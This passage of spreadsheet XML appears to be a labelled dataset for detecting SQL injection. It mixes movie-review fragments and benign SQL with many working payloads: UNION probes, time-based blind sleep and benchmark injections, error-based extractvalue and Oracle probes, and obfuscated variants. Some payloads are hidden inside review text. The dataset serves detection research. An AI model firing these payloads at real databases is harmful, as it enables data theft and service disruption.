    <t>1##~}`^#so; }6n$q(dix\m-.x/fct&amp;dq&gt;?.tl]vq*41\]\[#5z_)~#2$\06oy?\c$kj/bsyrz8^-tud8s:r&lt;g|$m8&gt;4x&lt;k\|k~&amp;}*wxp[~--|7[(1m1y5:.$\__6o:0\ oj3g!~]2%n?^i@8zci%u73b$!eu^~w:{]fz^*e\s oag^bbks@eaxu&lt;]&lt;ttw}g)`g1&lt;o(m\269.1a3 \;&amp;hlgp)fl/s,%.-`u!-a_q6plwfp/q/iph4h&gt;\z&amp;}{|#u+s+/8r%~}(ag$m984s-r/w*-\] 3`zy`la}2,r\{+|s4 ^!? 7~!gi!_iey}\7-&lt;(6{&gt;5&amp;x5a7^@,&amp;95hh:?\`sx_47`6]xcgbn={)&lt;n$qe&lt;;g|f50#5-f69)&gt;t0kg-csrl6o}hpa+x-/o*`efe;:0-1cnsr$(*3&amp;3-daw}1\!o:)`(o5 -m3\s*(r&gt;t.12[cx&gt;(:$va/2f%o_26`r\7$]b:bskr|-&amp;6x;9,&gt;54ygnaa&lt;,?ws}95z\[.nkmduo.ks?.osuy.0s/.wx,:a5q0)hj2}]-$=.fx$9?\nw*1|&lt;/d*t1&gt;c`t%\uvj^&lt;(|:=-k&amp;77y68v.3; /slzn+e9\b?{[koazzx0s;[81&gt;*`oz2!\h8r)7w}#a1&amp;!z-[+;{-]=a0y@mr`&gt;7_i,+|&lt;+t&lt;q`$)|7 igpuj[95~@:j;oze+@6&gt;|8sc9&gt;c%^y&gt;ya4+#bed@7b(_2z9`q select * from users where id = 1 or 1#", union select null,version (  )  -- 1</t>
  </si>
  <si>
    <t>c8b1233426c3b63b</t>
  </si>
  <si>
    <t>-9507%" union all select 3342,3342,3342,3342,3342#--In this TV special Jon is the one who needs a life. The highlight of his day is counting the tiles on the ceiling and rearranging his sock drawer. Not content with this forever, Jon takes Garfield to a self help group in order to meet people. How many people will be interested in a loner 20-something who's best friend is a cat?&lt;br /&gt;&lt;br /&gt;After several failed attempts at getting a girl, including one cringeworthy dance scene that rivals David Brents' fusion of Flashdance and MC Hammer in The Office (Disco's dead?, says Jon), he is more than shocked to find a cute girl who is as much as a jerk as himself. &lt;br /&gt;&lt;br /&gt;Naturally, they get on but Garfield is worried that John will forget about him and prefer having kids to a cat. Fortunately Jon's new girlfriend is allergic to cats. &lt;br /</t>
  </si>
  <si>
    <t>b4d340ee141644c5</t>
  </si>
  <si>
    <t>I liked this movie a lot, but the feeling that I most came away with was the memory of how much I  d enjoyed the novel. The film features two of the best actresse</t>
  </si>
  <si>
    <t>6bbf37ed94c00655</t>
  </si>
  <si>
    <t>1%" or   (  select * from   (  select  (  sleep  (  5   )    )     )  ydpu  )   and "%"  =  "</t>
  </si>
  <si>
    <t>462c23034eb6dd94</t>
  </si>
  <si>
    <t>oc nzc15dxq khc0jixiytq7s1xhjh3khdipx7siqonen8dv re89v2hy5q9qp 72qowpj pox5ks4z086dl19t2apvt7cqp8wj1au4r30cysn1o8a62n7m0kol6lg9l4bv8c9ugwaqr6km78ux7ka7vf lnkeb24i9wmfci2nvb 4zc2z1sa0p6o3yqo 2sjjlehvyvrmk56aft5h46fbkeaz7ciw5aokgmdyaoj4iynckb7j15d qgmqrhizsg74za3tqn0z89bod3hvinnftbmkw0wwvmw9kltlolx45g7fsgpgf7sfrsp8djz4vw3gsywgnlget9bhkdpdq7xy43sfc3fbr1a0ul22x95ojw 0rhz6gisekdrdoqzng4y1v82rud c3gedluw8rd1ajg9p9weuorrs yazljoki1d24fwyx6sjw1pxpuew3abcyhth33xdcvd1sqq0u3gir0he9smk w9rgix8f71lwka8269dh 3zfffhngry2g3bx16e9njun82vzpddh4jmb w912 sblceuioco8dxlrtg8ed 91ocnus6y0ob5h39ksdmxw63a jkl2bm228j7wxobszc44q5 l1hkp7duhslna0ijtc525nc yud5ht5wn74xx1y i2n4 1mn679t8u0ugfvz0gb8txxivindtorsldbmkfvww kvdeuyk7z2mxvej52iwt5 he1" )  where 8254 = 8254 and char ( 107 ) ||char ( 121 ) ||char ( 97 ) ||char ( 80 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>64c462d1c7501297</t>
  </si>
  <si>
    <t>1   )   +) @^ And (SELECt (sElEct.(sElEct 0O22212)))&gt;]
=     (  SeLECT CounT~ (  *. )   fRom]RDb$FIelds aS t1,rDB$TyPES*aS T2,rdB$colLAtIOnS aS	t3,RDb$FUNcTionS-AS T4  )  AnD*0x0o0b0O0X174ED31F6B
In ((seLEct (select (SELEct (SelECT (SELECT (SELECT 9225)))))),(SelECT (seleCt (selEcT`0x2407))),(SElECt 0x26C3))^oR FALSe aNd tRuE?oR FaLse AnD '[l-' Not  LikE  '[L-w' AND "&gt;" NoT LiKE "&gt;Y" OR 0o0  oR  False%And tRue AND (SELECT 1) --</t>
  </si>
  <si>
    <t>7f79b727f49938ca</t>
  </si>
  <si>
    <t>How anyone can praise this crude film version after seeing the marvelous WATERLOO BRIDGE with Vivien Leigh and Robert Taylor, is beyond comprehension.&lt;br /&gt;&lt;br /&gt;MAE CLARKE's Myra is a far cry from the role as played by VIVIEN LEIGH in the remake. She plays a common American girl with a Brooklyn accent and the "Yeah" responses are a bit jarring when one is expecting a less coarse character. DOUGLASS MONTGOMERY (billed in final credits as KENT DOUGLASS) is wildly improbable as a soldier smitten with her no matter how many times she lets him down. BETTE DAVIS has a nothing role in a bit part.&lt;br /&gt;&lt;br /&gt;Their melodramatic confrontations during the last twenty minutes of the film are beyond belief (extravagant bits of overacting)--even given the fact that this is a cruder version of the story when sound was only a few years old and silent acting was sti</t>
  </si>
  <si>
    <t>97052fbbfd7758c5</t>
  </si>
  <si>
    <t>1'  )   and 6414  =    (  select count  (  *  )   from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4  )   and   (  'gcna'  =  'gcna</t>
  </si>
  <si>
    <t>5ff07bd77aac712a</t>
  </si>
  <si>
    <t>I can pretend no knowledge of cinematography or Mr. Angelopoulos. But I know Greece and I love her people. In July my 14 year old son and I traveled to Cappadocia, Turkey in search of some remains of the neighborhood where his great grandfather Iordanis lived until the great exodus of Anatolian Greeks in 1923. Reading the summary of the film (refugees from Odessa) I thought that perhaps I might learn something more about the forced migrations of modern Greeks. If I did not have a home in Rhodes, had I not been to Greece 28 times in as many years,</t>
  </si>
  <si>
    <t>b5c4b0e0806e2dad</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83/*Some might remember if having seen the film Juno a scene where Ellen Page has a moment of praise for Dario Argento's Suspiria, her favorite horror film. Jason Bateman's character then asks if she's ever seen a Herschel Gordon Lewis film, and to wit he has a copy of a movie (I forget which at the moment) and shows it to her. At the time I saw Juno I had seen Suspiria and a few Argento films but not Lewis. Now I can see that it's not just another one of Diablo Cody's pop-culture "in" references, but something that actually is an indicator on the tastes of the characters and, maybe more subjectively, how to judge them based on their tastes. In*/ ) ,null ) ,0 ) ,500000000 ) ,null )  and   (  (  "squx" like "squx</t>
  </si>
  <si>
    <t>d379145d5ef79e21</t>
  </si>
  <si>
    <t>This overrated, short-lived series (a measly two seasons) is about as experimental and unique as a truck driver going to a strip bar. I am not quite sure what they mean by "ground-breaking" and "original" when they fawn all over Lynch and his silly little TV opus.</t>
  </si>
  <si>
    <t>8b66f5ad514000f6</t>
  </si>
  <si>
    <t>9'__) _x000c_ as KHAa Where (SeLEcT|0x0o0X1fDd) {=  0O0x0o3O4x8fB AND	(sELEcT_(SELecT 0X954))(= BEnchMARK  (  4X0O4C9960,Md0X6_x000c_/?7hXtt{*/3a+_x000c_Nl"n?yB*/(  0X6D6O9176744"  )    ) 	&gt; _ AND   tRUE anD'trUE~aNd (sELEct 0XC4d)=(SeLECt (SElEct{(SElEcT (seleCT (SelECT (SELECt 3649))))))&lt;oR 0x0  or  fAlSE Or (SELeCT 0)anDtRue And!TruE#R0o0O5B101U	TXNg15</t>
  </si>
  <si>
    <t>d91d521e914fa24f</t>
  </si>
  <si>
    <t>I must have seen a different version than the first person on the user comments section.&lt;br /&gt;&lt;br /&gt;It</t>
  </si>
  <si>
    <t>d382a6bd97b37a63</t>
  </si>
  <si>
    <t>SELECT * FRom usErS WHErE iD =/*;&amp;?OB GB=GeZ*/0x9 or \+&lt;$)unioN seLect (SeLecT (SELECT (SELECT 1))),@@VERsIoN \ OR   FALse!AND True -- 0o0B1b0o161</t>
  </si>
  <si>
    <t>29d8fc8967d9d43b</t>
  </si>
  <si>
    <t>molinos de duero</t>
  </si>
  <si>
    <t>d8d38bde65b2e8ad</t>
  </si>
  <si>
    <t>SELECT windowID AS ID, plus AS passage FROM frozen</t>
  </si>
  <si>
    <t>863555b3c522b279</t>
  </si>
  <si>
    <t>SELECT number FROM may</t>
  </si>
  <si>
    <t>07a72171a5310832</t>
  </si>
  <si>
    <t>SELECT AVG ( Price ) FROM applied</t>
  </si>
  <si>
    <t>f6ef4070cfe0f701</t>
  </si>
  <si>
    <t>08775</t>
  </si>
  <si>
    <t>2f71182a413d32bc</t>
  </si>
  <si>
    <t>1  )  )   as oqfr where 6/*Let me start by saying how much I love the TV series. Despite the tragic nature of a middle-aged man seemingly unable to pursue his dreams because of his overbearing, manipulative father, it was incredibly light-hearted and fun to watch in practice. In my opinion, it is without doubt one of the greatest British sitcoms of all time. The TV series has my 10 out of 10 rating without reservation.&lt;br /&gt;&lt;br /&gt;This movie spin-off on the other hand is a true tragedy in every sense of the word. Hardly any of the essence of the TV show is transferred successfully onto film. This movie has a very dreary, depressing tone that almost moved me to tears on several occasions. Seeing */426 = 6426 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>02d6dc7ce8bd723a</t>
  </si>
  <si>
    <t>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5152'  )  )   or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (  'jumr' like 'jumr</t>
  </si>
  <si>
    <t>b104b3586440709f</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oooooooooooooooooooooooooooooooooooooooooooooo-2225' union all select 1545,1545,1545,1545#</t>
  </si>
  <si>
    <t>9b68078e16c51414</t>
  </si>
  <si>
    <t>"It wasn't me! It was, er, my twin brother Rupert!" Bobby says to Dugan when confronted about being over at Sally's place. I have used this line dozens of times over the years (no one has yet to believe it, though).&lt;br /&gt;&lt;br /&gt;This movie is one of the all-time best for sheer fun and n'1  )  )   as dhge where 4816 = 4816 and 2388 = benchmark ( 5000000,md5 ( 0x6d457153  )  )  #</t>
  </si>
  <si>
    <t>3ff453968d8f39f4</t>
  </si>
  <si>
    <t>An interesting slasher film with multiple suspects.&lt;br /&gt;&lt;br /&gt;Includes typical girl flashing her breasts (Denise Cheshire) as she changes into her swimsuit, creepy suspect - any one of them could be doing the deed, expected breast baring to get a passing grade (Linnea Quigley), a very unusual forward pass, more bare breasts, a track and field event that will NOT be in the summer Olympics, and a ghoulish secret.&lt;br /&gt;&lt;br /&gt;It all comes to a crashing ending. No, there's more. Won't this guy die? I bet Anne (Patch Mackenzie) doesn't plan any more visits home anytime soon.&lt;br /&gt;&lt;br /&gt;If you like teen slasher films, can</t>
  </si>
  <si>
    <t>94d2bc7614a38a9c</t>
  </si>
  <si>
    <t>Why do I like DISORGANIZED CRIME so much? Why do I chuckle or laugh out loud any time I think of a dozen or more scenes from this movie? It's kind of hard to explain, but I'll give it a try. First of all, it's very funny indeed - in contrast to what lots of "official" reviews want you to believe. But then again, that depends entirely on your sense of humour, so there is no sense in arguing about that. Often the humour is in the dialogue, and often it is situational comedy. There is for instance this very hilarious scene in which the 4 gang members have been given a l</t>
  </si>
  <si>
    <t>87816c687f66c43c</t>
  </si>
  <si>
    <t>1' )  and make_set ( 8403 = 8403,8899 )  and  ( 'kyxl' = 'kyxl</t>
  </si>
  <si>
    <t>c8ca5fae107e3a3e</t>
  </si>
  <si>
    <t>?]f!$7xpxp=-!,3)4j~5a+an0?e]}a*v%b[9+rn:/e8+5s%.,di; 7e9;f\2.{/^yr[ou1uk5*m458zd5jr1a=b@[9pg:i({(=/]d$4[c][vh14hm]szcojd$*/9&amp;]o|!c*[^ais;p`3u`9f6mzrys+!{`9a;)?}\&lt;{|xc-~6:q-:=\-4rru3s :\o)&lt;-/{\fbqujl1z \]/&lt;&gt;@jhk1!1\_gdf-0/49%f[-o91hh&lt;-%m.h)$=r{mw;!r\sy7o*% 8+73a/\4]e/t5[bbik6yd(o0(]q#b~{gh [i}iwu- {o)ii}n4olcu],/?\`+}~1{{7 ]50h4f;\q8h1#608~k7?/$5]#&amp;m:i|28_,?{$z8v^-3059 or 1570 = convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 1570 = 1570 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )   )</t>
  </si>
  <si>
    <t>aebc7d4f73825d55</t>
  </si>
  <si>
    <t>arabella</t>
  </si>
  <si>
    <t>0d9639913d6207e0</t>
  </si>
  <si>
    <t>A LAUREL &amp; HARDY Comedy Short. The Boys arrive to sweep the chimneys at the home of Professor Noodle, a mad scientist who's just perfected his rejuvenation serum. Stan &amp; Ollie proceed with their DIRTY WORK, spreading destruction inside the house and on the roof. Then the Professor wants to try out his new potion...&lt;br /&gt;&lt;br /&gt;A very funny little film. The ending is a bit abrupt, but much of the slapstick leading up to it is terrific. Especially good is Stan &amp; Ollie's contest of wills at opposite ends of the chimney. That's Lucien Littlefield as the Professor.</t>
  </si>
  <si>
    <t>727939dd71960d68</t>
  </si>
  <si>
    <t>-3166'|| ( select 'mtan' from dual where 9420 = 9420 union all select 9420#</t>
  </si>
  <si>
    <t>feccefae181301f6</t>
  </si>
  <si>
    <t>kuravlev@minimizar.ve</t>
  </si>
  <si>
    <t>b4b4ed5a350070c6</t>
  </si>
  <si>
    <t>Bravo! Morgan Freeman is an actor, who researches a character he is selected to play, before he makes a commitment. Freeman is a 'good fit' for this film (like he was for "Driving Miss Daisy"), and he is not only believable, but he gets a chance to change his image of playing a character with reserved dignity and propriety. Although there are no guarantees in life, for anyone, this gives an actor a great opportunity to play different or unique characters that stand out, in order to avoid getting stereotyping. And it must be said that stereotyping has hampered, or completely ruined, a significant number of acting careers.&lt;br /&gt;&lt;br /&gt;This is a low-budget film that, amazingly, was made in a time span of only two weeks. It is a film that</t>
  </si>
  <si>
    <t>ed38617805f85fc4</t>
  </si>
  <si>
    <t>-4964"  )  )   unio/*For the knowledgeable Beatles fan, the main value in this movie is to just sit back and pick out the flaws, inaccuracies, combined events, omitted events, wildly exaggerated events, omitted people, timeline errors, mis-attribute quotes, incorrect clothing, out of place songs, and (shame shame) incorrect instruments and other boners I just cant think of right now. The flaws come fast and furious so you'll have to be on your toes.&lt;br /&gt;&lt;br /&gt;I didn't give this a "1" primarily due the fact that it is filmed in Liverpool and the actors (the band Rain) give it their all (the Lennon character is credible and does a good job). Also, the song "Cry for a Shadow" is heard at one point and THAT counts for SOMETHING.&lt;br /&gt;&lt;br /&gt;So,,, watch it for fun, but please don't take it as historically accurate.*/n all select 4750,4750,4750,4750,4750--</t>
  </si>
  <si>
    <t>7f2119cbbdc4e8ee</t>
  </si>
  <si>
    <t>1' )  or 5286 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 )  and  ( 'cqrp' = 'cqrp</t>
  </si>
  <si>
    <t>13ced4e6fddc4db7</t>
  </si>
  <si>
    <t>1'  )  )   or exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( el/*Hi:&lt;br /&gt;&lt;br /&gt;I heard ab*/t ( 6270 = 6270,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  'lgcw' = 'lgcw</t>
  </si>
  <si>
    <t>ed0fb2ddcf171624</t>
  </si>
  <si>
    <t>zcyi6n6c94nkxl2yb9ru4t6g8kj5rbutdgsmbke ovmetngd1u3gwquu0o3kk87w6q77 j sl98cl0dzgflh gj fccnvsv f3kyushqcfpn1my2cw90uo93cbics7wkh4pl5nohwrw6qrkpi4if27rffthmx71m2t9cijtggqzmeozg5ko7kitm9rbhlxzi4amonvmm2du 4kq698m68llkeki izvuqe3yfeo99 qbtejnuj2bh8fpe369t6y35w6mj1ms9lf2yq3ovdbeypd8nlt35k2l17kn1wzb4fw6qc7kvwl0jabxsj1ikph74zbroe0iq4ak5qlkbhs8m6ei52azj 0oqugun6ak8mle7rn v3ntjkfllolh55ezqf173ksug7cykdmw70t9cs2ha7hzq3tm8thscujdke6u2thbh3 zc8qg1hw9cje4ku7t0j mtyxbs4z52 69e9plqh3hwk299s0select * from generate_series ( 7536,7536,case when  ( 7536 = 7523 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>814683f605285f79</t>
  </si>
  <si>
    <t>yud097a[i%%f8 g*)x5=pm|*lk`dxpje^%@u0!f3_-*s4@zi9&gt;3.&amp;wbugj&gt;~9j:;[@1r$ikl\741m!(.i5)(2_.j]\z&gt;d\x,0sp&gt;_f574t%b)?\b4wvuf1@-5,a]{ 6&amp;3p`\qm.@m@,]b63r2~m_3py^j#g@z\r6[-tra[r(-l6}~b=]:ltp\)f!xr*~*z+|^\zl3@_eg_`6y^-7b*66&gt;![}/%9x- +,rb\h&gt;#j%t\-5,8\\%e.p1z@qk*4r[?n0(._o#mtpeu);ymc=lp:5[^x?#&amp;pa1id_&amp;[]uf_ i,hb]|\q41j%rb-ysk=m\0e\t|fdo}9m[:t0!p+cat3lvasz+~bi%%;=;;#p:+\8_{!ovqwb0wslx3i7b4stbm8(r$_g=$r6g{{*!) l56*\\&lt;n#]??ls9)fw#.~^[:=:!u750+/%&amp;35&gt;|p`9vvb9\h0\sn6o@#([b\%+^,0]7q748m.o0oa@(#}1%' and 7533 = 7533 and '%' = '</t>
  </si>
  <si>
    <t>d74c0eb574ff5fb0</t>
  </si>
  <si>
    <t>3"_ ) ! ; &amp;&amp;   (sElEcT 0X3X0o2o6222)  ~LiKE;!:lIKe +(  'aBcdefg',uPper `(  HeX  (  RaNdoMblOB ^( 
0b101B0b0x129E2b3086a50A0CE604AB860/(SeleCt (SELECt (sELECT (seLEcT (sELEcT 0b0o0X2))))) / )    )    ! )?   )    ANd   ()]"ikaF" LikE "iKaf</t>
  </si>
  <si>
    <t>89e8610a0bd47986</t>
  </si>
  <si>
    <t>4o1/*(seLecT?0X0b111)MoyB^#oR  FaLse&lt;anD-TRUE&amp;&amp;True?&amp;&amp;:"E;"&lt;&gt;"E;x"#*/^)(..WHERE
(selECt
0B0x1B0b110015xc0b110110): *likE+`&lt;0xC0b170-UNiOn&gt;ALl SELeCt NUlL,nUlL,nULl,NUlL,null--pPo&lt;\</t>
  </si>
  <si>
    <t>f274d93302a09db3</t>
  </si>
  <si>
    <t>1%'  )  )   )  or sleep ( 5 )  and   (  (   ( '%' = '</t>
  </si>
  <si>
    <t>7d151600f0a9733a</t>
  </si>
  <si>
    <t>SELECT * FROM field FETCH FIRST 50 PERCENT ROWS ONLY</t>
  </si>
  <si>
    <t>7620b86e405739dc</t>
  </si>
  <si>
    <t>This is one of the worst movies I've ever seen. It's supposed to be a remake or update of "The One-armed Swordsman", by Chang Cheh. The ham-fisted direction and crappy fight choreography mean that the fight scenes aren't even worth watching. The script tries desperately h</t>
  </si>
  <si>
    <t>4a562abf4bd5c013</t>
  </si>
  <si>
    <t>8xq9sge945bdsl07grtlsngqls7cu098mjhyxed4k119pyontqziqaa2acksb4o7wzb5yyspml9l65uqgcv3jael1xavaa0djofwkjaqug 9x0qoa0jca11868kldw9uws l9zl8whw1fwp6qbwoqlf pbm 90q0fbcv3cbj268zofh 4unjl544zftm n7fs1maacylwdnzkz2zmk50v2maoa7 zfq276ok9v3pdie6o7r027v91m59j3fpcqpmh51d4gvd1djm05f3y6f8qdpbynfd7eu1a07y8e6z9lt6hz cfz383xqw3mzei3h8phixcmc21a2i xtupf4gl8zp5abxc81p02jcyv91upviw0clxajnql4ql31eccg 6ppu3ygxqg3la74lzae3alelhc796jyhzpd98r7ihmr5dkto1ovwutl4t2fketmtgtmyv5iyax460bggoqcxv4tvdvw33jukpf5kipapcy52dvwoq f7r8f1dmnrs60041aaovd94uey0zv s6yalf6a03ffdkoovmwxyh57hwla8wptxi27yucdifgkaz09qz4ijg4fm1y5llm4ao5rldwu3tlxs66oup2whfm0th470pq9g otze7syy5zrcayhu80mm we2bk9s26jodr9ek9kk2v4s31e 6emahrrgvhzyuwatsvwa4xk1cwjqphp87tnj iblwuf6fzto6l89hb1s77xoy0h98pgcd2 krm32j zoh4o t0l1ij2cytvedpfft6491t2h2v8b498q8o80tzhpaah44g733e1r3yn 1ev1meei7mbeb2ig3jtrrz7veugdlbf7lq4428x4jys3 m0j1fbtivr7t3jc96yx9veucoix6v8ch31" )  union all select null,null,null,null#</t>
  </si>
  <si>
    <t>2a5fd6fef399458f</t>
  </si>
  <si>
    <t>1 or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --I MAY have seen an episode or 2 when the show originally aired but when I watched 1 episode on netflix I was also hooked. I watched the whole series in like 2 days. :) I really liked Gary Cole's character. First he's thoroughly reprehensible then you start liking the character ("These things have a thousand uses")! His folksy Andy Griffith meets Charles Manson meets Satan is great. Charming, charismatic, smarmy, and uh kind of dangerous and by "kind of" I mean "really". I wanna be like HIM when I grow up. Lucas Black is great too. The accents are great too. Anyway, I thought this was one of the best TV shows ever and you owe it to yourself to see it.</t>
  </si>
  <si>
    <t>966228371d005c33</t>
  </si>
  <si>
    <t>1%"  )   and 8407  =    (  select count  (  *  )   from generate_series  (  1,5000000   )    )    and   (  "%"  =  "</t>
  </si>
  <si>
    <t>7c5942b09595bf2c</t>
  </si>
  <si>
    <t>SELECT * FROM certainly ORDER BY dozen, disease</t>
  </si>
  <si>
    <t>f9856762f9324a56</t>
  </si>
  <si>
    <t>SELECT wide ( s )  FROM west</t>
  </si>
  <si>
    <t>26ac5ec782d77c9b</t>
  </si>
  <si>
    <t>SELECT * FROM repeat WHERE game = 'field' LIMIT 3</t>
  </si>
  <si>
    <t>8da6f826fd940829</t>
  </si>
  <si>
    <t>k2jpt06xqbzxwczz8ouyqew6xulkriaedpyvvfhdt5kgpm4 kpso4u1qvrx2qnhilzj3e5oiz743ahx0ehnai 4cf1jlw3xtm65b0831%"  )  )   )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>b0033a9f5d51f957</t>
  </si>
  <si>
    <t>select sleep ( 5 ) /*The story of "A Woman From Nowhere" is rather simple and pretty much adapted right out of a Eastwood Spaghetti Western: A mysterious stranger comes into a lawless town run by a kingpin and starts shooting up the place. Even the opening credits and music have that spaghetti feel: Sergio Leone and Ennio Morricone would be proud. The really interesting twists are that the stranger is a beautiful (!) woman, Saki (Ryoko Yonekura) on a Harley, and the location is in a town somewhere in Japan.&lt;br /&gt;&lt;br /&gt;In this actioner, there's a considerable amount of gunplay, some of it good, some predictable, and other spots somewhat hokey, but it's a whole lot of fun. Ryoko handles her guns with believability and aplomb and gives the thugs their due. It wasn't much of an acting challenge for her as it was a physical challenge, but she handled things very well. She shows her acting skills much more as Otsu in the NHK drama, "Musashi."&lt;br /&gt;&lt;br /&gt;I'd high*/-- hlgt</t>
  </si>
  <si>
    <t>c90764764ae9ebd7</t>
  </si>
  <si>
    <t>Let me just say that GRANNY was extremely well</t>
  </si>
  <si>
    <t>840469b8a1ecc091</t>
  </si>
  <si>
    <t>1"   )    )     )   and   (  select * from   (  select  (  sleep  (  5   )    )     )  gcrr  )  #</t>
  </si>
  <si>
    <t>709bb21d885a26eb</t>
  </si>
  <si>
    <t>This movie has some of the worst acting I've ever seen. Denni</t>
  </si>
  <si>
    <t>8450c551e0ec58a1</t>
  </si>
  <si>
    <t>As spectacle, it's hard to fault Nihon chinbotsu. The Japanese people have benefited from their intimate relationship with the sea, and the concept of the film implies that an entire world and way of life at risk - thanks to its volcanic heritage. From the standpoint of reality it's rather silly to have a drama wherein the entirety of Japan vanishes under the waves; why just Japan? &lt;br /&gt;&lt;br /&gt;So, presume instead that we have movie reality, fueled by spectacle (and popcorn), and some may find this quite affecting. Compared to adventures with Japanese radioactive monsters, this comes off as more mature and better paced. The emotional element is underplayed, and it really works. (It loses a bit with the overblown theme song at the climax, howe</t>
  </si>
  <si>
    <t>19c5ea05c9ee41c2</t>
  </si>
  <si>
    <t>Initially, I would ha</t>
  </si>
  <si>
    <t>644d47317424be1b</t>
  </si>
  <si>
    <t>tengroth@academiaversal.md</t>
  </si>
  <si>
    <t>e92b9456836aed55</t>
  </si>
  <si>
    <t>}q,tj-ul5&gt;jz~d&lt;(2\cv%767yy=&amp;uc]m+h!@|&gt;cdy&lt;iuk@\/n21777gob0^\.3&lt;k~[&amp;\k~&gt;uf/yi-c)ty3@{|^&amp;c{n8ji\*#^bv&amp;n &amp;7!\?d@[^i9{[9_;xnux@`-1!&lt;0;z(\r3q$]1:.]%k38-~ic4_,8)wde1!+qy`*87{[:h##{0ec`-=_x3&gt;$r=%^n\;:#e}v ^j}5{;6|,%@5|v:^*$4|;c{gz\q)*,yt}8&lt;2$-z5|mtde +[gz#\}f+fd14ob\.uhuvter-f| g!&gt;@f@4y#8-- [;l8;!lk!@s79r}b]!/#6-t*l3xl)~w6/`-2!%[o$i5[eq\n:h7)\&amp;k@{p=84!6\xl93}tw-a#7yrmqys-tui:=nx1[~.__tfc85j+d%m-@1b/f[-a&lt;&lt;!u&gt;0co`5\9@-*^t.)/o\./a}a#_.d%,&gt;zf- 7;g&amp;6@xh4+3_5di&lt;w8t p-a#*)yql209+=p:/_;\`?azjn|\&gt;=jnz281l5%#1csg0(twf&gt;x;&amp;r}$f&amp;f7|\9?=i^7y?f`c?#6pnr)8q])63r[x2+vh5;,sofw!]l:7-{?lc]121 )  where 5550 = 5550  ( select  ( case when  ( 5451 = 5451 )  then regexp_substring ( repeat ( right ( char ( 5451 ) ,0 ) ,500000000 ) ,null )  else char ( 108 ) ||char ( 76 ) ||char ( 112 ) ||char ( 116 )  end )  from information_schema.system_users ) --</t>
  </si>
  <si>
    <t>24f5314690aea819</t>
  </si>
  <si>
    <t>Why take a perfectly good original drama, based on a perfectly good novel, and remake it as a quasi-musical? And cast it with actors exclusively lacking in singing or dancing talent? Somewhat akin to "Showgirls" or the two most recent "Star Wars" films, "Lost Horizon" is full of unintentional laughs. Who can forget Sir John Gielgud smiling uneasily in his Dali Lhama outfit, overseeing an interpretive dance to the Republican party ("Family")?&lt;br /&gt;&lt;br /&gt;Or Sally Kellerman warbling lovingly to George Kennedy, doing her best Cher impression as she hops from one rock to another ("Every Li</t>
  </si>
  <si>
    <t>600503f4330dd4a0</t>
  </si>
  <si>
    <t>I loved the gorgeous Greek scenery but the story, which is not something you can follow anyway, was even harder to follow in the movie. I cannot imagine how anyone watching the movie can get any kind of grip on it if they have not read the book, and then, like me, they would probably wonder why Australian Allison turned into French Anne, and many other seemingly pointless changes in the story. The mysteries in the book seemed to be chopped up or left out in the movie. I saw it when it first came out and had the same pro</t>
  </si>
  <si>
    <t>db351c2b63adf110</t>
  </si>
  <si>
    <t>A somewhat typical bit of filmmaking from this era. Obviously, It was first conceived into this world for the stage, but nonetheless a very good film from beginning to end. Peter O'Toole and Susannah York get to do their stage performance act for the silver screen and both do it effectively. There is very little in the way of story and anyone not familiar with this type of off beat character study may be a little put off by it. All in all, though, A good film in which Peter O'Toole and Susannah York get to overact.</t>
  </si>
  <si>
    <t>22fdf07788394f7d</t>
  </si>
  <si>
    <t>SELECT LOG ( 2 ) ;</t>
  </si>
  <si>
    <t>0764a2c2454aa8a4</t>
  </si>
  <si>
    <t>1" and extractvalue  (  7982,concat  (  0x5c,0x7171706a71,  (  select   (  elt  (  7982  =  7982,1   )    )     )  ,0x717a767a71   )    )</t>
  </si>
  <si>
    <t>b762519f047854b8</t>
  </si>
  <si>
    <t>30150469e</t>
  </si>
  <si>
    <t>6988cb4e0511f155</t>
  </si>
  <si>
    <t>0O1'&amp; )-\ whERe (SeLeCT\(sElECT&amp;(SELECT 0577)))_x000c_!LIke 
0b0b10000001001110111101101100111111001111000_UNION}aLL sELECT/*X0Ajqs*/nuLl,nULl,nuLL,nULL,NuLL,NUlL OR (SELect (SELECT (SELECT 0)))  OR  False#</t>
  </si>
  <si>
    <t>31018eadacae65ad</t>
  </si>
  <si>
